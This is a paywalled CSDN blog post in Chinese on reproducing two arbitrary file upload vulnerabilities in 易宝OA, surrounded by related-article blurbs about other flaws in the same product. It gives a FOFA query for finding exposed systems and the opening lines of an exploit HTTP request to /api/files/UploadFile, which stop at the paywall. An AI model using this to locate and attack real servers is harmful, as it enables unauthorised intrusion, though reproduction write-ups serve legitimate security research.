易宝OA 两处任意文件上传漏洞复现

0xSecl

已于 2023-12-06 21:36:50 修改

阅读量1k

点赞数 12

分类专栏：漏洞复现文章标签：安全 web安全

于 2023-12-06 21:36:09 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/134839608

版权

漏洞复现专栏收录该内容

720 篇文章 1127 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、流程管理、知识管理（档案和业务管理）、协同办公等多种功能。

0x02 漏洞概述

易宝OA系统UploadFile、BasicService.asmx等接口处存在文件上传漏洞，未授权的攻击者可以上传恶意后门程序执行任意代码，获取服务器权限

0x03 复现环境

FOFA：app="顶讯科技-易宝OA系统"

0x04 漏洞复现

PoC-1

POST /api/files/UploadFile HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-url

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

12
点赞
踩
9

收藏

觉得还不错? 一键收藏
打赏
0
评论
易宝OA 两处任意文件上传漏洞复现

易宝OA系统UploadFile、BasicService.asmx等接口处存在文件上传漏洞，未授权的攻击者可以上传恶意后门程序执行任意代码，获取服务器权限
复制链接

扫一扫

专栏目录

订阅专栏

易宝OA_UploadFile接口任意文件上传漏洞

weixin_43567873的博客

03-28

222

易宝OA_UploadFile接口任意文件上传漏洞

易宝OA 多处 SQL注入漏洞复现

0xSec

11-30

1074

易宝OA ExecuteSqlForSingle、IsPartNumber接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限

参与评论您还未登录，请先登录后发表或查看评论

新接口-易宝OA某接口存在任意文件读取漏洞-1day未公开漏洞

weixin_43167326的博客

02-25

859

易宝 OA（Office Automation）是一款企业级办公自动化系统，旨在帮助企业实现高效的协同工作和业务流程管理。易宝 OA 提供了一系列功能强大的工具，包括但不限于流程审批、文档管理、日程安排、协同办公、人事管理等，为企业提供了一个集成化的解决方案。易宝 OA 的特点是易于使用、高度可定制、开放性强，支持多种平台和设备，可以满足不同企业的需求。易宝 OA 通过提高工作效率、降低运营成本、优化业务流程等方面，为企业带来了显著的商业价值。

【漏洞复现】易宝OA-BasicService-文件上传

知黑而守白

03-28

158

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、流程管理、知识管理（档案和业务管理）、协同办公等多种功能。易宝OA系统 BasicService 接口存在任意文件上传漏洞，该漏洞使得攻击者可以在受影响的系统上上传恶意文件，潜在风险包括远程执行恶意代码、访问敏感数据，以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统，可能导致灾难性后果。

易宝OA系统DownloadFile接口存在文件读取漏洞

qq_36334672的博客

03-06

227

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、流程管理、知识管理（档案和业务管理）、协同办公等多种功能。DownloadFile接口处存在任意文件读取漏洞，未授权的攻击者可以利用此漏洞读取系统内部敏感配置文件，数据库密钥凭证等，使系统处于极不安全的状态。

易宝OA BasicService存在任意文件上传漏洞

weixin_43167326的博客

03-28

895

易宝支付ios类文件

01-20

易宝支付是知名的第三方支付平台，为商家提供便捷的在线支付解决方案。在iOS平台上，开发者需要集成易宝支付的相关SDK和服务来实现应用内的支付功能。本文将深入探讨易宝支付在iOS开发中的实现细节，包括POST请求...

易宝支付官方文件(asp c# java)

12-02

易宝支付官方文件(asp c# java)

易宝支付sdk

11-07

易宝支付SDK是一种专为开发者设计的工具包，用于集成易宝支付平台的功能到自己的应用程序中。易宝支付是中国领先的第三方支付平台，提供多种在线支付解决方案，包括但不限于信用卡支付、借记卡支付、网银转账以及...

易宝php接口sdk

01-07

`lib`目录则包含了易宝PHP接口SDK的核心库文件，这些文件通常包含了一系列类和方法，用于与易宝支付服务器进行通信。例如，可能会有`YopRequest`类，用于构造API请求；`YopClient`类，用于发送HTTP请求并处理响应；...

PHP第三方支付易宝支付最新sdk包，其中包含回调。

09-27

4. **文件名称列表**："易宝支付sdk"可能是一个压缩文件，包含了SDK的源代码、示例代码、README文档等资源。解压后，开发者可以查看示例代码了解如何初始化、调起支付和处理回调，同时阅读文档获取更详细的使用指南...

文件上传漏洞（一）

不秃头的程序Yang

05-18

2798

简介 文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤，而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。如常见的头像上传，图片上传，oa 办公文件上传，媒体上传，允许用户上传文件，如果过滤不严格，恶意用户利用文件上传漏洞，上传有害的可以执行脚本文件到服务器中，可以获取服务器的权限，或进一步危害服务器。 ...

移动互联安全扩展要求测评项

hakksjss的博客

07-10

1151

应为无线接入设备的安装选择合理位置，避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当，易被攻击者利用，特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击，因此要选择合理的位置安装无线接入设备。

车载视频监控管理方案：无人驾驶出租车安全出行的保障

最新发布

TSINGSEE青犀视频官方技术博客

07-12

730

为了确保数据的安全性和可靠性，本方案采用云存储技术，将车辆视频数据和相关信息存储在云端。

中小学校园EasyCVR视频综合监管方案：构建安全、智能的校园环境

TSINGSEE青犀视频官方技术博客

07-10

1191

针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管，及时发现违规异常情况，并能向监管人员及时发送告警信息，保障在校师生的食品与饮食安全。

[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约

rolt的专栏

07-10

840

系统的外部可观察行为和物理特征

网络安全威胁情报到底是什么

学-> 思->用

07-10

474

网络安全威胁情报是提升组织安全态势的重要手段，通过收集和分析各种威胁信息，组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报，组织可以增强防御能力、提升事件响应效率，并通过情报共享与合作，共同应对复杂多变的网络威胁。

Foxit Reader：高效、安全、多功能的PDF阅读器技术解析

运维人生

07-10

528

由福建福昕软件开发股份有限公司开发，是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度，还全面支持最新的PDF文档属性，并提供了丰富的插件和自定义选项，极大地提升了用户体验。

易宝支付资金流水汇总查询接入流程 csdn

02-01

易宝支付是国内知名的第三方支付平台，为商家提供了各种支付解决方案。资金流水汇总查询是易宝支付提供的重要功能，可以帮助商家快速了解自己的交易资金情况。接入流程如下：首先，商家需要在易宝支付官网注册账号并完成实名认证，然后提交相关资料进行商户审核。其次，商家需要在易宝支付后台创建应用并获取对应的商户号和密钥，同时设置支付回调地址和通知地址。然后，商家需要根据易宝支付提供的开发文档，进行接口对接和调试，确保能够正常发起支付请求和接收支付通知。接着，商家需要使用资金流水汇总查询接口，通过提交查询条件获取相应的交易数据，并对返回的数据进行处理和展示。最后，商家需要及时监控资金流水情况，确保资金安全并及时进行对账和结算。通过以上接入流程，商家可以顺利地使用易宝支付的资金流水汇总查询功能，方便地查看自己的交易数据，更好地管理自己的资金。希望以上回答对您有所帮助。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交